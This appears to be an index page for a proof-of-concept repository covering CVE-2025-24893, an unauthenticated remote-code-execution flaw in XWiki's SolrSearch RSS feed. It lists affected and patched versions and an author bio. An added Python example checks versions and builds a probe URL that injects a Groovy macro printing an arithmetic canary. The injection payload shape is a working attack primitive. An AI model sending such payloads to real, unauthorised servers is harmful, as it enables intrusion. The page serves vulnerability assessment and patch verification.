
CVE-2025-24893 PoC — XWiki Platform security vulnerability

Source
Associated Vulnerability
Title: XWiki Platform security vulnerability (CVE-2025-24893)
Description: XWiki Platform is XWiki's open-source wiki platform for building web collaboration applications. XWiki Platform contains a security vulnerability: any guest user can achieve remote code execution through a request to SolrSearch.
Description
A critical unauthenticated remote code execution (RCE) vulnerability (CVE-2025-24893) exists in the XWiki Platform, specifically in the RSS feed output of the SolrSearch endpoint, which any guest user can request.
Readme
# CVE-2025-24893 – XWiki Remote Code Execution (RCE)

## Overview
**CVE-2025-24893** is a **critical unauthenticated Remote Code Execution (RCE)** vulnerability in **XWiki**, a widely used open-source enterprise wiki platform.  
The flaw is in the RSS feed output of the `Main.SolrSearch` page: the search text supplied in the request is rendered as wiki syntax instead of being escaped, so an attacker can close the surrounding macro and inject a `{{groovy}}` macro, which XWiki then evaluates on the server.  

This allows **remote, unauthenticated attackers** (any guest user) to execute arbitrary Groovy code on the server, potentially gaining full control of the affected system.

---

## Vulnerability Details

- **CVE ID:** CVE-2025-24893  
- **Severity:** Critical  
- **CVSS v3.1 Score:** 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)  
- **EPSS Score:** 92.01% (Very high likelihood of exploitation)  
- **Published:** February 20, 2025  

---

## Affected Versions
- XWiki Platform 15.x releases before `15.10.11`
- XWiki Platform 16.x releases before `16.4.1` (the 16.5 line carries the fix from `16.5.0RC1` onward)
- Older release lines (14.x and earlier) are affected as well and never received a fix

## Patched Versions
- `15.10.11`  
- `16.4.1`  
- `16.5.0RC1`
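The following pre-exploitation checks are an added example; they are not code from this page or from the PoC repository it indexes. They cover the two points above: deciding from a version string whether an install is on a fixed release, and building a non-destructive probe that distinguishes a server that evaluates the injected `{{groovy}}` macro from one that renders the search text literally. The `Main.SolrSearch` request path and the arithmetic canary payload shape follow the public XWiki advisory for this CVE rather than this page; the host name and the two RSS bodies are constructed samples.

```python
"""Pre-exploitation checks for CVE-2025-24893 (XWiki Main.SolrSearch Groovy injection).

Added example, not code from this page or from the PoC repository it indexes.
The request path and the canary payload shape follow the public XWiki advisory
for this CVE; the host names and RSS bodies below are constructed samples.
"""
import re
from urllib.parse import quote, urljoin

# First fixed release on each affected line (see "Patched Versions" above).
FIXED_15 = (15, 10, 11)
FIXED_16 = (16, 4, 1)

_VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> tuple[int, int, int]:
    """Reduce '15.10.11', 'XWiki 16.3.0' or '16.5.0RC1' to (major, minor, patch).

    Pre-release suffixes such as RC1 are ignored; 16.5.0RC1 already carries the fix.
    """
    match = _VERSION_RE.search(text)
    if not match:
        raise ValueError(f"unrecognised XWiki version string: {text!r}")
    major, minor, patch = match.groups()
    return int(major), int(minor), int(patch or 0)


def is_affected(version: str) -> bool:
    """True if this XWiki version predates the fix on its release line."""
    v = parse_version(version)
    if v[0] < 15:              # 14.x and older lines never received the fix
        return True
    if v[0] == 15:
        return v < FIXED_15
    return v < FIXED_16        # 16.x and later; 16.5.0RC1 sorts above FIXED_16


# Non-destructive canary: if the server evaluates the injected Groovy macro,
# the feed contains the computed sum; a patched server echoes the text back.
CANARY_A, CANARY_B = 23, 19
CANARY_TAG = "cve-2025-24893-canary:"
PROBE_PATH = "/xwiki/bin/get/Main/SolrSearch"   # path per the public advisory (assumption)


def build_probe_url(base_url: str) -> str:
    """Build the RSS search URL carrying the canary macro as the `text` parameter."""
    payload = (
        "}}}{{async async=false}}{{groovy}}"
        f'println("{CANARY_TAG}"+({CANARY_A}+{CANARY_B}))'
        "{{/groovy}}{{/async}}"
    )
    return urljoin(base_url, f"{PROBE_PATH}?media=rss&text={quote(payload, safe='')}")


def classify_response(body: str) -> str:
    """Classify the RSS body returned for the probe URL.

    'vulnerable'   : the sum appears, so the Groovy macro ran on the server
    'patched'      : the canary text came back literally (rendered as plain text)
    'inconclusive' : neither marker present (WAF, Solr disabled, different path, ...)
    """
    if f"{CANARY_TAG}{CANARY_A + CANARY_B}" in body:
        return "vulnerable"
    if CANARY_TAG in body:
        return "patched"
    return "inconclusive"


# Constructed sample bodies (not captured from a real server).
SAMPLE_VULNERABLE = (
    "<rss><channel><title>RSS feed for search on [cve-2025-24893-canary:42]</title>"
    "</channel></rss>"
)
SAMPLE_PATCHED = (
    "<rss><channel><title>RSS feed for search on [}}}{{async async=false}}{{groovy}}"
    'println("cve-2025-24893-canary:"+(23+19)){{/groovy}}{{/async}}]</title></channel></rss>'
)


if __name__ == "__main__":
    for ver in ("15.10.10", "15.10.11", "16.3.0", "16.4.1", "16.5.0RC1"):
        print(ver, "affected" if is_affected(ver) else "fixed")
    print(build_probe_url("https://wiki.example.com/"))  # hypothetical host
    print(classify_response(SAMPLE_VULNERABLE), classify_response(SAMPLE_PATCHED))
```

The probe only prints an arithmetic result, so it confirms server-side evaluation without touching the filesystem or spawning processes; send it only to systems you are authorised to test, and treat an `inconclusive` result as "verify the version another way" rather than as "not vulnerable".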

## 👨‍💻 About Me

I'm Ulfat Ibadov, a penetration tester and cybersecurity mentor currently working with **EC-Council**. My main focus is on offensive security, including red teaming, vulnerability research, and real-world exploitation techniques.

I’ve completed multiple certifications, including:
- Certified Ethical Hacker (CEH & CEH Practical)
- Web Application Hacking and Security (W|AHS)
- Certified Cybersecurity Technician (C|CT)
- Certified Penetration Testing Specialist (CPTS – HTB Academy)
- Certified Penetration Testing Specialist (**BBH – HTB Academy**)

I’m also an active bug bounty hunter and top-ranked participant on platforms like **TryHackMe** and **Hack The Box**, where I currently rank in the top 1%.

I'm passionate about helping others learn ethical hacking through hands-on labs and mentoring.

## 📎 Connect with Me 
- [LinkedIn](https://www.linkedin.com/in/ibadovulfat/)
- [Portfolio](https://about.surf) 
File Snapshot

[4.0K] /data/pocs/14ec1fe3a27b9a57d146414ff490c194bedb8b90
├── [3.2K] CVE-2025-24893.py
├── [1.0K] LICENSE
└── [1.9K] README.md

0 directories, 3 files